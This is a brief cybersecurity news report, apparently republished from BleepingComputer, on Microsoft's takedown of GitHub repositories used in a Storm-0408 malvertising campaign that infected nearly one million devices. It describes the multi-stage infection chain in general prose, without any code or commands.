The malvertising videos redirected users to the GitHub repos that infected them with malware designed to perform system discovery, collect detailed system info (e.g., memory size, graphic details, screen resolution, operating system (OS), and user paths), and exfiltrate the harvested data while deploying additional stage-two payloads. "This activity is tracked under the umbrella name Storm-0408 that we use to track numerous threat actors associated with remote access or information-stealing malware and who use phishing, search engine optimization (SEO), or malvertising campaigns to distribute malicious payloads," Microsoft said. The company's threat analysts detected these attacks in early December 2024 after observing multiple devices downloading malware from GitHub repos, malware that was later used to deploy a string of various other payloads on compromised systems. Microsoft's report provides additional and more detailed information regarding the various stages of the attacks and the payloads used across the multi-stage attack chain of this complex malvertising campaign. In the last stage of the attack, the AutoIt payloads use RegAsm or PowerShell to open files, enable remote browser debugging, and exfiltrate additional information. While GitHub was the primary platform to host payloads delivered during the campaign's first stage, Microsoft Threat Intelligence also observed payloads hosted on Dropbox and Discord. Microsoft has taken down an undisclosed number of GitHub repositories used in a massive malvertising campaign that impacted almost one million devices worldwide.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 06 Mar 2025 20:55:18 +0000